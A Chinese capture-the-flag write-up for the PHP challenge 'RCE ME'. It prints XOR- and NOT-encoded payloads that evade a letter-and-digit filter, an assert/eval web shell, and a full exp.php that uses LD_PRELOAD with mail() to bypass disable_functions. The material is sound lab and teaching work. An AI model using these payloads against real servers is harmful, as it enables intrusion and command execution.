[极客大挑战 2019]RCE ME

代码执行，过滤了字母数字，用异或或取反都可以

code=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

发现过滤了大部分命令执行的函数，下面考虑如何绕过，有两种方法

①蚁剑插件

首先构造一个木马

code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=eval($_POST[%27a%27]);

flag无法读取，读取/readflag发现是二进制文件


② LD_preload + mail劫持so来执行系统命令

bypass_disablefunc_x64.so文件地址

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

上传exp.php

// exp.php
$cmd = "/readflag";
$out_path = "/tmp/1.txt";
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = "/tmp/bypass_disablefunc_x64.so";
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
echo "
 output: 
" . nl2br(file_get_contents($out_path)) . "
";
unlink($out_path);
?>

code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=include%20%22/tmp/exp.php%22;

关于LD_preload + mail劫持so

https://www.freebuf.com/articles/web/192052.html
https://www.anquanke.com/post/id/175403#h2-0
https://imagin.vip/?p=508
https://www.cnblogs.com/yesec/p/12483631.html
https://blog.csdn.net/crisprx/article/details/104349608